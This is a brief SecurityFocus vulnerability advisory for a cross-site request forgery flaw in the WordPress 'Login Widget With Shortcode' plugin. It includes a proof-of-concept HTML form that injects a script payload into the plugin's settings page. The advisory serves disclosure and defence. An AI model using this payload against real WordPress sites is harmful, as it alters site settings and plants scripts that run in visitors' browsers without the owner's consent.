WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability

To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.

The following example data is available:

<form method="POST" action="http://www.example.com/wp-admin/options-general.php?page=login_widget_afo">
<input type="text" name="custom_style_afo" value="</textarea><script>alert(1)</script>">
<input type="text" name="option" value="login_widget_afo_save_settings">
<input type="submit">
</form>


 

Privacy Statement
Copyright 2010, SecurityFocus